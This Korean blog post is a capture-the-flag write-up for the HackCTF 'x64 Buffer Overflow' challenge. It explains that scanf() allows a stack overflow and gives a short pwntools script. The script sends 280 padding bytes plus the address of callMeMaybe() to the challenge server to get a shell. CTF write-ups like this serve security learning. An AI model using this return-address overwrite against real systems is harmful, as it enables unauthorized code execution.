ii4gsp

HackCTF - x64 Buffer Overflow 본문

시스템 해킹/HackCTF

HackCTF - x64 Buffer Overflow

ii4gsp 2020. 2. 9. 12:47

파일을 다운받아 주자.

 

 

 

 

IDA로 열어보면 scanf()함수에서 취약점이 발생한다.

 

 

 

 

callMeMaybe()함수에서 쉘을 실행시킨다.

main()함수의 ret를 callMeMaybe()의 함수로 조작해주면 된다.

 

 

 

 

callMeMaybe()함수의 주소는 0x0000000000400606이다.

dummy 280byte를 채우고 callMeMaybe()함수의 주소를 넣어주면 된다.

 

 

 

 

from pwn import *

r = remote('ctf.j0n9hyun.xyz', 3004)

payload = ''
payload += '\x90' * 280
payload += p64(0x0000000000400606)

r.sendline(payload)

r.interactive()

소스코드를 작성해주자.

 

 

 

 

'시스템 해킹 > HackCTF' 카테고리의 다른 글

HackCTF - Simple_Overflow_ver_2  (0) 2020.02.09
HackCTF - x64 Simple_size_BOF  (0) 2020.02.09
HackCTF - 내 버퍼가 흘러넘친다!!!  (0) 2020.02.09
HackCTF - Basic_FSB  (0) 2020.02.09
HackCTF - Basic_BOF #2  (0) 2020.02.08
Comments